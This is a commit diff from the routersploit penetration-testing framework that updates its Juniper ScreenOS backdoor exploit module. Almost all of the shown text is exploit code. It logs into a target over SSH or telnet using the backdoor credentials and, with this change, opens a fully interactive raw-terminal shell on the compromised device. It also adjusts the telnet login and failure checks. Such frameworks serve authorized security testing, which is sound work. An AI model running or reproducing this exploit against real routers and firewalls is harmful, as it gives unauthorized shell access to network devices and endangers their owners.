Juniper ScreenOS backdoor exploit fix.

a098d4c5 · lucyoa · 45fc5789 · a098d4c5
Commit a098d4c5 authored May 09, 2016 by lucyoa
Hide whitespace changes
Inline Side-by-side

Showing with 39 additions and 9 deletions

screenos_backdoor.py routersploit/modules/exploits/juniper/screenos_backdoor.py +39 -9

No files found.
--- a/routersploit/modules/exploits/juniper/screenos_backdoor.py
+++ b/routersploit/modules/exploits/juniper/screenos_backdoor.py
-import paramiko
 import telnetlib
+import paramiko, StringIO, termios, tty, sys, select, socket
 from routersploit import (
    exploits,
@@ -45,22 +45,51 @@ class Exploit(exploits.Exploit):
        else:
            print_success("SSH - Successful authentication")
-            cmd = ""
+            chan = ssh.invoke_shell()
-            while cmd not in ["quit", "exit"]:
+            oldtty = termios.tcgetattr(sys.stdin)
-                cmd = raw_input("> ")
+            try:
-                stdin, stdout, stderr = ssh.exec_command(cmd.strip())
+                tty.setraw(sys.stdin.fileno())
-                print stdout.channel.recv(2048)
+                tty.setcbreak(sys.stdin.fileno())
-            return
+                chan.settimeout(0.0)
+                while(True):
+                    r, w, e = select.select([chan, sys.stdin], [], [])
+                    if(chan in r):
+                        try:
+                            x = unicode(chan.recv(1024))
+                            if(len(x) == 0):
+                                sys.stdout.write('\r\nExiting...\r\n')
+                                break
+                            sys.stdout.write(x)
+                            sys.stdout.flush()
+                        except socket.timeout:
+                            pass
+                    if(sys.stdin in r):
+                        x = sys.stdin.read(1)
+                        if(len(x) == 0):
+                            break
+                        chan.send(x)
+            finally:
+                termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
+                return
        try:
            tn = telnetlib.Telnet(self.target, 23)
+            tn.write("\r\n")
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
            tn.write(self.password + "\r\n")
            tn.write("\r\n")
-            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+            (i, obj, res) = tn.expect(["Failed", "failed"], 5)
            if i != -1:
                return False
@@ -88,13 +117,14 @@ class Exploit(exploits.Exploit):
        try:
            tn = telnetlib.Telnet(self.target, 23)
+            tn.write("\r\n")
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
            tn.write(self.password + "\r\n")
            tn.write("\r\n")
-            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+            (i, obj, res) = tn.expect(["Failed", "failed"], 5)
            tn.close()
            if i != -1: